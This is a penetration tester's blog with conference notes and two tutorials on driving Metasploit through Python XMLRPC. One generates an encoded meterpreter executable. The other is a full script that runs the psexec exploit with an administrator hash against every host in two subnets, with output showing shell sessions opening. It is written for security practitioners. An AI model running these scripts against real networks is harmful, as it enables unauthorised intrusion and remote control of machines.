Blog.HappyPacket.net

Security Notes, News, and Thoughts

New MSFRPC Post

I have posted a new article about using MSFRPC over at http://blog.spiderlabs.com. This post will walk you through how to talk to Metasploit using Python and show off some new code that I released as part of SpiderLabs Git Repo at : https://github.com/SpiderLabs/msfrpc. Let me know if you have thoughts or suggestions.

Derbycon

It's been busy here. I've been getting ready to present at SecTor in Toronto, and at Triangle InfoSec Con in Raleigh next week.

But, I wanted to take a few minutes to update the blog about Derbycon.

Derbycon was incredible. I am humbled and grateful that the organizers allowed me to participate, and I look forward to being able to attend next year. It was great to see everyone there. I would highly recommend this conference for InfoSec practitioners. In case you missed it, the videos have been posted. I have also posted the latest tarball for my code for the project I talked about at Derbycon.

Derbycon was also my first chance to see my new book in print. I'm very excited about it. I hope those of you who choose to buy a copy find it useful. Feel free to drop me a line if there is other detail you would like to see in a book. Jason and I are looking into taking a deeper dive into the subject matter in hopes of a new project.

Slides and Code from Vegas

Thanks to all who came to see me present this week. I had a great time. I have gotten some good feedback from folks, and so I'm going to be updating a lot of code in the near future. Until then, I've put slides and code online for now. As I go through and clean up some stuff and release production versions I will be posting videos online. Until then, here are slides and code and if you have any questions feel free to email me or hit me up on twitter.

Code: http://www.happypacket.net/VegasCode2010.tar.bz2

Slides: http://www.slideshare.net/sussurro

Thanks,
Sussurro

Fun with Metasploit payload generation

Tonight has been fun, I have been learning more about how payloads are generated inside Metasploit. My goal was to figure out how to add the msfencode functionality into the generate_simple function that is used by both XMLRPC and the console so that you can encode payloads and all that fun stuff from within Metasploit. I think I have it working now, and once Metasploit is loaded there seems to be a significant speed difference. Here is what I found:

I wrote a quick xmlrpc test to get an executable payload from Metasploit encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.


import xmlrpclib
import binascii
proxy = xmlrpclib.ServerProxy("http://localhost:55553")

ret = proxy.auth.login("msf","abc123")
if ret['result'] == 'success':
token = ret['token']
else:
print "Could not login\n"

opts = {
"Format" : 'exe',
"Iterations" : 7,
"ForceEncode" : True}

ret = proxy.module.execute(token,"payload","windows/meterpreter/bind_tcp",opts)
if(ret['result'] == 'success'):
print binascii.unhexlify(ret['payload'])




Next.. I decided to do a test of the xmlrpc vs the traditional way of doing it:


root@bt:~/msfmods/py# time (python get_payload.py > /tmp/test3)

real 0m3.839s
user 0m0.020s
sys 0m0.043s
root@bt:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )

real 0m10.548s
user 0m7.553s
sys 0m2.920s
root@bt:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit




It definitely appears we have a speed increase, and with the additional overhead of an auth in the way, it's possible to take a little bit more time off of it. Being able to do this over XMLRPC hopefully will give a good way for folks to grab payloads remotely and easily for common tasks.

Have thoughts or suggestions ?

Hit me up at sussurro [aT] happypacket DOT net

Sharing data remotely through Metasploit

I've been working on some more XMLRPC stuff for Metasploit, and I wanted to share just a teaser for what is to come in the future. I'm working on some more integration between tools, but for now I have written a db module for Metasploit's XMLRPC engine which allows remote processes to get information from the database. Below is a quick demo of a remote host, having done a scan with nmap uploading remotely the data into Metasploit for it to be acted on. This of course is just the tip of the iceberg, as this API will allow for automated reporting, data sharing across tools, for Metasploit to be used as the central knowledge repository for various tools across multiple testers machines to store data.

I'm still waiting to hear back from Defcon and B-Sides Las Vegas, but if my talk gets accepted either place, you will get to see a whole lot more.

Sorry for the blurry, I'll do better next time:

Sharing data between hosts with Metasploit from Ryan Linn on Vimeo.

PSExec Scanner via Metasploit XMLRPC

I was inspired by Jabra's excellent post on creating a PSExec scanner with Metasploit and Perl to demonstrate how this same thing could be done locally or remotely using XMLRPC. The original post by Jabra is also a good way to do this, and can be found here: http://spl0it.wordpress.com/2009/12/17/metasploit-psexec-scanner-via-perl/

Python and libxmlrpc make an easy way to accomplish this task. To start with, we need to start Metasploit up on our host system and start the xmlrpc module

sussurro@msfdev:~/metasploit$ ./msfconsole

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #


=[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 305 exploits - 67 auxiliary
+ -- --=[ 171 payloads - 20 encoders - 6 nops
=[ svn r7908 updated today (2009.12.17)

msf > load xmlrpc Pass=abc123 ServerType=Web
[*] XMLRPC Service: 127.0.0.1:55553
[*] XMLRPC Username: msf
[*] XMLRPC Password: abc123
[*] XMLRPC Server Type: Web
[*] XMLRPC Web URI: /RPC2
[*] Successfully loaded plugin: xmlrpc
msf >
After we have XMLRPC loaded, then we can get down to some python programming.

The assumption is, much like with Jabra's program, that we are going to be scanning 2 networks, the 192.168.1.X and the 2.X networks. The first thing we need to do is get authenticated into Metasploit.
user = "msf"
password = "abc123"
token = ""

msf = xmlrpclib.ServerProxy("http://localhost:55553/RPC2")
auth = msf.auth.login(user,password)

if auth["result"] == "success" :
token = auth["token"]
else:
exit("Login failed, try again\n")

We setup our username, msf, and our super secret password of abc123 first, and then we use the xmlrpclib library to connect to our Metasploit server. Once we are connected, the msf object holds our connection information.

When we are connected, the first thing we need to do is authenticate so that we get an authentication token. The authentication token is required for all future actions unless your session goes idle. We authenticate with the "auth.login" method and the object we get back contains our token.

Next we need to call our actual exploit, to do this we create a small function to make the calls a little bit more clear.

def callSploit(ip):
ret = msf.module.execute(token,"exploit","windows/smb/psexec",
{
"RHOST" : ip,
"PAYLOAD" : "windows/meterpreter/bind_tcp",
"SMBUser" : "Administrator",
"SMBPass" : "LM:NTLM HASH" })
if ret["result"] != "success" :
print "Exploit failed for " + ip + "\n"

We have defined a function called callSploit which takes an IP address. We are asking our Metasploit connection to launch the module.execute function, specifying our authentication token, the type of module we are calling (exploit) and the module itself that we will be using. The final argument is all of the arguments that we would traditionally pass inside the Metasploit console. Once we launch the exploit, we get back a result object, and a result of success means that the request was valid. While the requests are launching, we can see the sessions popping up in the Metasploit console and can interact with them one at a time.

The next stage in our program is to do the actual call of our new function:
for net in range(1,2):
for ip in range(1,254):
callSploit("192.168." + str(net) +"."+ str(ip))
time.sleep(1)


print "DONE.. check for shells"
Here we have just went through the 192.168.1 and .2 range and the list of IP addresses valid for each submit and executed our callSploit function. The jobs will be running quickly, however if you look inside msfconsole and type in "jobs" repeatedly you should see

msf > jobs

Jobs
====

Id Name
-- ----
2 Exploit: windows/smb/psexec

Finally, once you have a host that works you will hopefully see

[*] Meterpreter session 4 opened (192.168.1.5:36435 -> 192.168.1.44:4444)
[*] Meterpreter session 5 opened (192.168.1.5:43357 -> 192.168.1.130:4444)
[*] Meterpreter session 6 opened (192.168.1.5:48619 -> 192.168.2.3:4444)


To get Metasploit, go over to http://www.metasploit.com
Jabra's blog is a great read: http://spl0it.wordpress.com

Here is the script in easier copy and paste form:
#!/usr/bin/python

import xmlrpclib
import time

user = "msf"
password = "abc123"
token = ""

msf = xmlrpclib.ServerProxy("http://localhost:55553/RPC2")
auth = msf.auth.login(user,password)

if auth["result"] == "success" :
token = auth["token"]
else:
exit("Login failed, try again\n")

def callSploit(ip):
ret = msf.module.execute(token,"exploit","windows/smb/psexec",
{
"RHOST" : ip,
"PAYLOAD" : "windows/meterpreter/bind_tcp",
"SMBUser" : "Administrator",
"SMBPass" : "LM:NTLM HASH" })
if ret["result"] != "success" :
print "Exploit failed for " + ip + "\n"

for net in range(1,2):
for ip in range(1,254):
callSploit("192.168." + str(net) +"."+ str(ip))
time.sleep(1)


print "DONE.. check for shells"


Thoughts on SecTor

Last week I had the opportunity to speak at SecTor: Canada's Premier IT Security Conference. I had heard positive feedback regarding the conference from previous years and as the conference is only in its 3rd year the number of attendees was impressive. I have attended a number of other conferences in the past year including ShmooCon, BlackHat and Defcon and I thought that the organization of this conference was impressive. For being a new conference I thought that SecTor had a great lineup of speakers, quality vendors, and some great keynotes.

From a speaker's prospective, my first communications with the SecTor team came during the Call For Papers(CFP) stage. Brian Bourne, the primary face of SecTor, was very responsive through this process and once I had been notified that I had been accepted to speak the rest of the planning started. Nanna Ng initiated the trip planning process and guided me through all the steps needed to get plane and hotel reservations handled. SecTor takes excellent care of their speakers. I was amazed at the extent they went to in order to make my trip painless.

SecTor had handled the booking for both airlines and hotel, so once I had all my presentation materials in, all I had to do was show up at the airport. After landing in Toronto there was a car waiting for me to take me to the hotel, where I was checked in without incident. The accommodations at the InterContinental hotel were great and it was attached to the conference center so it was just a short walk from the hotel room to the conference area. The SecTor team had worked to make sure that the travel was painless and the experience that they created for the speakers was amazing.

The conference itself started on Tuesday although there was some training on Monday. After some opening remarks by Brian, Chris Hoff delivered a great keynote on Cloud Computing. Chris is a great speaker and brought forth a ton of information on "the cloud" in an easy to understand way and really made all of the information mesh.

Following the keynotes the sessions started. The first session I attended was "When Web 2.0 Attacks - Understanding AJAX, Flash and "Highly Interactive Technology" by Rafal Los. Rafal is a great speaker and had some good information on some of the vulnerabilities that Web 2.0 present when implemented poorly and had some great points on how many of the old vulnerabilities that we thought had been dealt with are re-emerging in Web 2.0. I really enjoyed this talk.

Andrew Nash from PayPal delivered a lunch keynote. While this was my least favorite keynote, there was good information on identity management. Mr Nash is a good speaker, unfortunately I am not sure that it was as relevant to as many people at the conference. I thought it was interesting to hear some of what PayPal was doing, but there was no real link into how anyone else can leverage the resources or how the information pertained to us aside from that PayPal is working hard to protect our information.

The afternoon sessions were great. After lunch I headed over to see Jennifer Jabbusch's talk "Retaliation: Breaking Attack Vectors in the Infrastructure". She did a great job of explaining emerging threats on the network and what the latest standards are doing to help protect layers 2 and 3 in the network.

The next talk that I went to was by Robert Hansen (RSnake) on ""Consumerization and Future State of Information Warfare". Robert focused on where information warfare is heading and how the technology used by attackers has grown to the point where we are likely to see automated identities formed soon where automated applications role play a part in order to bring people in to their social media circle where the typical spam and malware will be distributed sparingly between meaningful information. Overall a really informative talk although the findings of his research were a little disheartening as it is obvious that the attackers are moving quickly and are very agile.

That evening was a reception and speakers dinner at Joe Badalis. I thought that this was hugely successful. I met some great people and had a chance to talk with both attendees and other speakers and it was overall a great time. The dinner that followed the reception was great and I had some awesome discussions with the other folks at the table. This was a great experience and I hope they keep this for future years.

There was no keynote on Wednesday morning and we instead went directly into talks. I attended Andrés Riancho two talks on the w3af framework. These talks took up the whole morning but the time was well spent. I learned much more about the w3af framework and where it is headed.
Andrés gave great demos and examples of everything from how to do a scan to how to write your own module. He even included some information about how w3af handles web scanning compared to other vendors. Andrés offers w3af training in case anyone is interested, so check it out if you want to know more about the w3af framework.

The lunch keynote was by Adam Laurie known as Major Malfunction. The title was "A day in the life of a hacker.." and covered some great stuff on hardware hacking. He was very engaging as a speaker and even included technical examples during the keynote which seems to be very rare. He went in-depth into how the biometric passports work and exposed some of the scarier sides of the technology that you don't normally get to see.

The rest of the day I was presenting. My first talk on Nsploit went ok, although it wasn't an overwhelming success. I'm not sure if it was the post lunch coma, if the talk was too technical, or if it was just boring but I didn't get a lot of interaction during the talk. I did get a lot of good questions after the talk though so that was nice. The second talk on BeEF seemed to go well with great interaction, some awesome questions, and people seemed to be much more into it. Overall it was a good experience but I may need to tweak the Nsploit talk if I do it again.

The conference finished with some closing remarks from Brian again. The vendor drawings were held and folks got their toys, and then a few of us went out for Mexican across the street for some more networking. Overall I got to meet some great people, hear some awesome talks, and had a great experience thanks to the organizers of SecTor. I hope that I get to attend next year, whether as a presenter again or as an attendee I know that I will enjoy it.

Thanks again to all the organizers of SecTor for making the trip memorable in a positive way. Hope to see everyone again next year.